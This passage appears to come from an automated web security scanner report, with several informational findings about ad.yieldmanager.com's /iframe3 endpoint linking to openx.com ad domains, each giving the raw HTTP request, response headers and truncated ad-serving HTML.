GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD9FGF46uDRCkzLqfRrhkjU6-2Y8g8Cm5cleGR8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3106932746%26r%3D0%26s%3D2126909,7b34a5d2-ed53-11e0-bf3f-78e7d1f5c93e,1317600362623 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:03 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0134.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:06:03 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600362_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlT2FrgzAQ.TV-k5AYpxbZh9ggyBqZQybtl6JJnM5qXHTY-euXzdI.0OO4e-94945DOETQr6ATuByLqsaeHyLscB-V0MXchmEYIifYYew6nj0lkSAUwYTsC-5l5D.ojr5syFQakCzZ2GtAwEIBcJVmyzb6YgG
...[SNIP]...
hYcUTHtVtPt5fM.rNtN.M8WphYTmxSgFmXQl6BGuVwBVz1ZljWGoyNEcVa1lpOjYWpCy3HW9UgW2GY94T-OK8MbodJ6vmsy0Go.jx895XU50ZqaQQXxY3iF6ANc80=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600362_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600362_HERE" border="0" alt=""></a>
...[SNIP]...
19.80. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD6ow3tseTRCs-tqzjHcy.5xKS.kqzQfynuVPr5AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2840894453%26r%3D0%26s%3D2126909,bbaea994-ed55-11e0-a2a0-78e7d162f036,1317601329790 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:22:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0257.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:22:10 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601329_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyLLNW6gHE0pFG9JGokHJBYFtCiVgaqig-fq4JcoPdLXanRnNziLDtxCn2EGlx5jtYFz4yMDUwS61sKND3.eRjSGGpmV5-hgHjIQIxmSTUXtP.ir0wpcVqRm6ZB-v7M0lYA4BMIVM5lX6Slx
...[SNIP]...
SyNkmPP6dPctndctT9g67X0zRoBtFwpJqBSRaML0AMvF8AFZ0Si0qCoVamSPJK8rHWjNCEGrYvoucNU8y20C-npcJNP3I55bLomejy.rsrucxrLrkynAVVjiviyXPW,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601329_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601329_HERE" border="0" alt=""></a>
...[SNIP]...
19.81. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABuia83zubRCjMvEnDoFKmImlJonsh4OitDh-MjAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D615783940%26r%3D0%26s%3D2126909,fddf278e-ed56-11e0-8fad-78e7d15f8c04,1317601870334 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:12 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0174.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:12 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601870_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljN1qhDAQhZ.GOwmJpv4gvYjrKtLVdkG2rDeiSVwXf2KjRbtP31AXX6DDMPOd4cxBpmeXdY0oQwwa2LWZ4SHToLaJYMW4Dj3Psy2EDMfEWJ9in5EAwZgcjtQ6k78K3OBtIzUDh5zFpj4cApYAACxksmynr8S
...[SNIP]...
Ym2aV.j5Il3R.Jq6438zxqJtGMUDUDsywZX4EY-bACKnp1LGsJxkaZQslryadGMwMMNcN6iIHfmVLWC3SVppXi-zBxOReyHJjoi-G7r7gsGi65MnSCKscvSQJz9Q==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601870_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601870_HERE" border="0" alt=""></a>
...[SNIP]...
19.82. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AmUr7OPRCuqOuYi0Rb9Z40wvYs7slNR-Ce9CAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D172571110%26r%3D0%26s%3D2126909,462d795c-ed55-11e0-b45e-78e7d15fdc1e,1317601132650 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:57 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0181.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:18:57 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601132_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlT9tugzAM.RreUJQLhVRoD6FRJ7SmGxKjEi-IJulgBdIFpqJ-.bJR9QdmWT7nWMe2jEhMoSRUryMtjw4ljRHBMsIrhQPowziOUYhwRNYBgv6YJopxBFO2OcgwY3.B1.xlYa5yyrJ0UW-UgSsHIDBWXJfWl6D
...[SNIP]...
VZ5EVfPou5vL.k5p98v5mmi0eYh7cuFZhsrfQMzEUPM5Cmd836ZMGlcaat1Serx8YjPIAeDm9m0K1yKlyhXy2PjrfDqO1U2XpQpq-G7.6obdVoq52hM9I5fgDV9XNu,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601132_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601132_HERE" border="0" alt=""></a>
...[SNIP]...
19.83. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC3ecU3rt7RCtwYiu21AEeXXVowGoBDxM-RsztsAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D3977708441%26r%3D0%26s%3D2126909,25ff5716-ed52-11e0-9cb1-78e7d15f4c1c,1317599790170 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:56:30 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0117.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:56:30 GMT
Pragma: no-cache
Content-Length: 1842
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599790_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGlTl2LgzAQ.DW-SUj8FrkHvZxHsMp5SIt9EU3iWazGRo-Kv.7CWfoHuiy7M8PssMgMaO23zGqo03oNpA0PkGlQFyHLblwdBkGAHN.1ITRsT59JxEKMIAmjJLnl4X9hHyc7UhN7YV7u7MsLwR0DYAmZ3nfplnr
...[SNIP]...
a5YH1aHIfsM13Lx5.q.k3Xu2WZNDPUjFg1A4usGV-BmPi4AioGJdatBFOnTLHkreRzp5nYgprhbGLkF6aYYyOkOG0Uvowzl0sl65GJoRp.h4bLquOSK8NVUOX4A-XAc-8=,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599790_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599790_HERE" border="0" alt=""></a>
...[SNIP]...
19.84. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH.F5UcePRCuCwtfo3B2knb2pKdjGhQkcWhYSkAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2857559119%26r%3D0%26s%3D2126909,fcc5c5c6-ed54-11e0-b59a-78e7d1fa05a2,1317601009496 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:56 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0354.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:16:56 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601009_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljNFqhDAURL.GNwkxuuoifdBNLdKNVBClvoia2OiqsdGy4tc31GV.oJdwMzOcO4bpNQ6ymVVDB7bUcSzbM0ykMrOtkKVDz.OQc7IdBF3T0JcooD42YORfXhs78f8Gn.H7odTGrp-Iw324PrhjACwhyf2Ivok
...[SNIP]...
RG8oITnHHy6FH3L7rO13XWTF9DoXoUrLKibANiZtMGGjGqsGolmLmCQslayRaumdiCGrJ3MbGOKmef4Fn5pla6mxYm11JWExVjOf2MNZMlZ5IpYBCNIn4Bvelzig==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601009_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601009_HERE" border="0" alt=""></a>
...[SNIP]...
19.85. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADFKhLjl-PRCpXAjl72UGhsEsEBBlrlfT-Qd9TmAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D232964029%26r%3D0%26s%3D2126909,1392b75a-ed55-11e0-95e1-78e7d1f5a968,1317601047749 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:33 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0395.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:17:33 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601047_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljNFqgzAUhp.GOwlJjDYiu4hNC27VrmDruhtRk85ia1x0VHz6hTp8gR0O53z.4T8.cgLfk1RQt0SYXEoBVwFycLXChPoU2jAIAuJAiDH0kN1HoWAcwYitN5V3YM.iPn-byUxO2UHN6p0y8OAAEKXjx3z6jil
...[SNIP]...
VNnJ3ROW3wfnlkL7ZdD0NnOczCW9MCDLoQcgSqk-0IKnU3x-KiQVcb01bLi5Z9bTmcQAt7k2rlVRjludA3uioNX9te6iHXRSvUPW9.7qXUeS21NIabqozjFxkpcu8=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601047_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601047_HERE" border="0" alt=""></a>
...[SNIP]...
19.86. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnFnpLYuHRCpLrTdS5UufZf6XS.ZW79MFa93pSAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3860644282%26r%3D0%26s%3D2126909,c2ce5668-ed53-11e0-853d-78e7d1f5c952,1317600482748 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:03 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0052.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:08:03 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
